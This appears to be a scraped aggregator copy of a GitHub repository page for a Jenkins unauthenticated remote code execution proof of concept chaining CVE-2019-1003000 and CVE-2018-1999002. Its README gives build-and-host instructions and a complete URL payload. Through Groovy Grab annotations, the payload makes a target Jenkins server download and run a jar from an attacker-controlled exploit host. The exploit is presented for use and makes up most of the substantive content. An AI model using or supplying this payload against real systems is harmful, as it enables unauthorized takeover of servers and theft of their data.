66

Jenkins RCE PoC. From unauthenticated user to remote code execution (Chaining CV...

 5 years ago
source link: https://www.tuicool.com/articles/hit/rIfAjeM
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

Join GitHub today

GitHub is home to over 31 million developers working together to host and review code, manage projects, and build software together.

Sign up

Jenkins RCE PoC. From unauthenticated user to remote code execution - it's a hacker's dream! (Chaining CVE-2019-1003000, CVE-2018-1999002, and more)

exploit jenkins rce orangetw unauthenticated hacking

Branch: master

Find file

Clone or download

Clone with HTTPS

Use Git or checkout with SVN using the web URL.

Open in Desktop Download ZIP

Launching GitHub Desktop ...

If nothing happens, download GitHub Desktop and try again.

Launching GitHub Desktop ...

If nothing happens, download GitHub Desktop and try again.

Launching Xcode ...

If nothing happens, download Xcode and try again.

Launching Visual Studio ...

If nothing happens, download the GitHub extension for Visual Studio and try again.

EraQry3.jpg!web

petercunha Update README.txt

Latest commit 106973c Feb 20, 2019

Permalink Type Name Latest commit message Commit time Failed to load latest commit information. code Initial commit Feb 19, 2019 www/package/payload/ 1 Initial commit Feb 19, 2019 README.txt Update README.txt Feb 20, 2019 build.sh Initial commit Feb 19, 2019

README.txt

JENKINS UNAUTHENTICATED REMOTE CODE EXECUTION
---------------------------------------------

Exploit compiled by me, but full credits for exploit discovery and exploit chaining go to Orange Tsai (orange.tw).

Read his write-ups on this exploit here -
Part 1: <a href="https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html" rel="nofollow">https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html</a>
Part 2: <a href="http://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html" rel="nofollow">http://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html</a>
His github: <a href="https://github.com/orangetw">https://github.com/orangetw</a>


INSTRUCTIONS:
-------------
- Edit code/Payload.java to your specifications, then run build.sh to generate a jar and copy it to the web folder.
- Once that is finished, copy the inner contents of www/ to a webserver.
- In the URL payload, replace <TARGET HOST> with the hostname of the server, and <EXPLOIT HOST> to the hostname of where you uploaded your files.


URL Payload:
------------
http://<TARGET HOST>/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile
?value=
@GrabConfig(disableChecksums=true)%0a
@GrabResolver(name='payload', root='http://<EXPOIT HOST>')%0a
@Grab(group='package', module='payload', version='1')%0a
import Payload;

report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK